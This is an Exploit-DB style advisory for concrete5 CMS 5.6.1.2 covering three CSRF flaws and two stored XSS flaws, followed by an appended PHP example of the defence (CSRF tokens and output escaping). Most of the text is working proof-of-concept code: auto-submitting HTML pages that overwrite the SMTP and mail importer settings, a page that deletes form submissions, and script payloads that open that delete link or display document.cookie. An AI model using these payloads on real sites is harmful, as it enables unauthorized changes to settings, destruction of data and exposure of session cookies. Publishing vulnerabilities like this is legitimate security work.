Concrete5 CMS 5.6.1.2 - Multiple Vulnerabilities

EDB-ID: 26077
CVE: (none listed)
Platform: PHP
Date: 2013-06-10


=============================================================
        __   __          _    ___    _   __   ____         
        \ \ / /         | |  / _ \  (_) /_ | |___ \        
   ___   \ V /   _ __   | | | | | |  _   | |   __) |  _ __ 
  / _ \   > <   | '_ \  | | | | | | | |  | |  |__ <  | '__|
 |  __/  / . \  | |_) | | | | |_| | | |  | |  ___) | | |   
  \___| /_/ \_\ | .__/  |_|  \___/  |_|  |_| |____/  |_|   
                | |                                        
                |_|              blackpentesters.blogspot.com
=============================================================

###########################################################################################
# Exploit Title: [ concrete5 CMS v5.6.1.2 Multiple CSRF and Stored XSS Vulnerabilities]   #
# Date: [2013-6-9]                                                                        #
# Exploit Author: [expl0i13r]                                                             #
# Vendor Homepage: [http://www.concrete5.org/]                                            #
# Software Link: [http://www.concrete5.org/download_file/-/view/51635/8497/]              #
# Version: [5.6.1.2]                                                                      #
# Google Dork: [Built with concrete5 - an open source CMS]                                #
# Tested on: [Windows]                                                                    #
# Contact: expl0i13r@gmail.com                                                            #
###########################################################################################

Summary:
========
 1. CSRF (Modify SMTP Settings)
 2. CSRF (Modify Mail Importers Settings)
 3. CSRF (Delete Form Results)
 4. Stored XSS


1. CSRF (Modify SMTP Settings):
================================

concrete5 v5.6.1.2 suffers from multiple CSRF vulnerabilities, one of which allows an attacker
to modify the "SMTP Settings" and "Send Mail Method" options available at the URL below:

Affected URL:
--------------
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/method/


----------------------------------------------------------------------------------------
Note: the code below holds a pre-filled copy of the settings form and submits it as soon as the victim loads the page, so the settings are updated with the attacker's values.
----------------------------------------------------------------------------------------

<html>
<head>
<script type="text/javascript">
 // Submit the pre-filled settings form as soon as the page has loaded
 function submitform()
 {
 	document.getElementById('mail-settings-form').submit();
 }
</script>
</head>
<body onload="submitform()">
<!-- Copy of the dashboard "Mail Settings" form; save_settings accepts it without any anti-CSRF token -->
<form name="myForm" method="post" action="http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/method/save_settings/" class="form-horizontal" id="mail-settings-form">

<input type="radio" name="MAIL_SEND_METHOD" id="MAIL_SEND_METHOD2" value="SMTP" class="ccm-input-radio" checked>
<input id="MAIL_SEND_METHOD_SMTP_SERVER" type="text" name="MAIL_SEND_METHOD_SMTP_SERVER" value="127.0.0.1" class="ccm-input-text">
<input id="MAIL_SEND_METHOD_SMTP_USERNAME" type="text" name="MAIL_SEND_METHOD_SMTP_USERNAME" value="expl0i13r" class="ccm-input-text">
<input id="MAIL_SEND_METHOD_SMTP_PASSWORD" type="text" name="MAIL_SEND_METHOD_SMTP_PASSWORD" value="expl0i13r" class="ccm-input-text">
<select name="MAIL_SEND_METHOD_SMTP_ENCRYPTION" id="MAIL_SEND_METHOD_SMTP_ENCRYPTION" class="ccm-input-select">
<option value="">None</option>
<option value="SSL" selected="selected">SSL</option>
<option value="TLS">TLS</option>
</select>
<input id="MAIL_SEND_METHOD_SMTP_PORT" type="text" name="MAIL_SEND_METHOD_SMTP_PORT" value="" class="ccm-input-text">

</form>
</body>
</html>


2. CSRF (Modify Mail Importer Settings)
=========================================

The code below exploits a CSRF vulnerability that allows an attacker to edit and update the "Importer Settings" details.

Affected URL :
---------------

http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/importers/edit_importer/1/

----------------------------------------------------------------------------------------
Note: the code below holds a pre-filled copy of the importer form and submits it as soon as the victim loads the page, so the importer settings are updated with the attacker's values.
----------------------------------------------------------------------------------------

<html>
<head>
<script type="text/javascript">
 // Submit the pre-filled importer form as soon as the page has loaded
 function submitform()
 {
 	document.getElementById('mail-importer-form').submit();
 }
</script>
</head>

<body onload="submitform()">

<!-- Copy of the dashboard "Edit Importer" form; save_importer accepts it without any anti-CSRF token -->
<form name="myForm" method="post" id="mail-importer-form" class="form-horizontal" action="http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/importers/save_importer/">

<input type="hidden" name="miID" id="miID" value="1">
<input id="miEmail" type="text" name="miEmail" value="exploiter">
<input id="miServer" type="text" name="miServer" value="127.0.0.1" class="ccm-input-text">
<input id="miUsername" type="text" name="miUsername" value="" class="ccm-input-text">
<input id="miPassword" type="text" name="miPassword" value="" class="ccm-input-text">
<input id="miPort" type="text" name="miPort" value="8080" class="ccm-input-text">

<select name="miEncryption" id="miEncryption" class="ccm-input-select">
<option value="" selected="selected">None</option>
</select>

<select name="miIsEnabled" id="miIsEnabled" class="ccm-input-select">
<option value="1" selected="selected">Yes</option>
</select>

<select name="miConnectionMethod" id="miConnectionMethod" class="ccm-input-select">
<option value="POP" selected="selected">POP</option>
</select>

</form>

</body>
</html>


3. CSRF (Delete Form Results)
===============================

Each submission listed on the "REPORTS" > "Form Results" page has a static "qsID" assigned to it; an attacker who knows that value can delete the submissions.

Ex.
---
When the CMS is installed, a "Contact Us" form is available by default at the URL: http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/blog/hello-world/about/contact-us/

For the above contact form, the qsID in my case is "1370626098", which can be found at the URL:

--------------------------------------------------------------------------------------
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/ 
--------------------------------------------------------------------------------------

<a href="/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/?qsID=1370626098&action=deleteFormAnswers" class="btn small error delete-form-answers ccm-button-v2-left">Delete Submissions</a>
------------------------------------------------------------------------------------------------------

To exploit this CSRF, the attacker must know the "qsID" value, which requires at least limited access to the CMS.

Steps:
------

1. The attacker logs in to the CMS
2. Navigates to "http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/"
3. Reads the static "qsID" value from the page source
4. Uses the "qsID" in the CSRF exploit below

Code:
-------

<html>
<head>
<script>
// "delete" is a reserved word in JavaScript, so the function needs a different name
function deleteSubmissions()
{
	// Delete the submissions of the "Contact Us" form (qsID 1370626098); the GET request carries no anti-CSRF token
	window.open("http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/?qsID=1370626098&action=deleteFormAnswers")
}
</script>
</head>
<body onload="deleteSubmissions()">
</body>
</html>


4. Multiple Stored XSS
=======================

concrete5 CMS also suffers from stored XSS vulnerabilities; the first one below can be combined with the CSRF above so that form results are deleted every time the affected page is loaded.

Stored XSS-1
============

URL:
----
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/users/add_group/

Vulnerable Parameter:
----------------------
<input type="text" name="gName" class="span6" value="" id="acpro_inp2">


XSS-CSRF Payload:
------------------

"><script>window.open("http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/?qsID=1370626098&action=deleteFormAnswers");alert('Form Result Data Deleted - eXpl0i13r')</script>


Stored XSS-2:
=============

URL:
-----
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/attributes/sets/

Vulnerable Parameter:
----------------------
<input id="asName" type="text" name="asName" value="" class="ccm-input-text">

Payload:
---------

"><script>alert('hacked by eXpl0i13r\n'+document.cookie)</script>
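As an added defensive example (not code from this advisory or from concrete5 itself), the plain PHP below shows the two fixes these findings call for: a per-session synchronizer token required on every state-changing POST, which refuses the auto-submitting forms and the GET-based delete link in sections 1 to 3, and HTML escaping of gName and asName on output, which renders the section 4 payloads as literal text. The function names and the "ccm_token" field name are assumptions.

```php
<?php
// Added example, not concrete5's own code: a synchronizer token for the
// state-changing dashboard actions above (save_settings, save_importer,
// deleteFormAnswers) plus output escaping for gName / asName.
// Function names and the "ccm_token" field name are assumptions.

session_start();

// One random token per session, embedded in every form that changes state.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Accept only a POST whose token matches the session's token. A page on
// another origin cannot read the token, so the auto-submitting forms above
// (and the GET-based deleteFormAnswers link) are refused here.
function require_csrf_token(): void
{
    $sent = (string) ($_POST['ccm_token'] ?? '');
    $expected = (string) ($_SESSION['csrf_token'] ?? '');
    if ($_SERVER['REQUEST_METHOD'] !== 'POST' || $sent === ''
        || !hash_equals($expected, $sent)) {
        http_response_code(403);
        exit('Invalid or missing request token');
    }
}

// Escape user-controlled values wherever they are placed into HTML, so a
// group or attribute-set name such as "><script>... is displayed literally.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

$gName = '';
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    require_csrf_token();              // check before any setting is saved
    $gName = (string) ($_POST['gName'] ?? '');
    // ... persist the validated settings here ...
}
?>
<form method="post" action="">
  <input type="hidden" name="ccm_token" value="<?= h(csrf_token()) ?>">
  <input type="text" name="gName" value="<?= h($gName) ?>">
  <button type="submit">Save</button>
</form>
```

The same require_csrf_token() check belongs on the delete action in section 3, which additionally has to be moved from a GET link to a POST form so a token can travel with it.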


##################################
#           eXpl0i13r            #
# ------------------------------ #
#|blackpentesters.blogspot.com  |#
#|infotech-knowledge.blogspot.in|#
# ------------------------------ #
##################################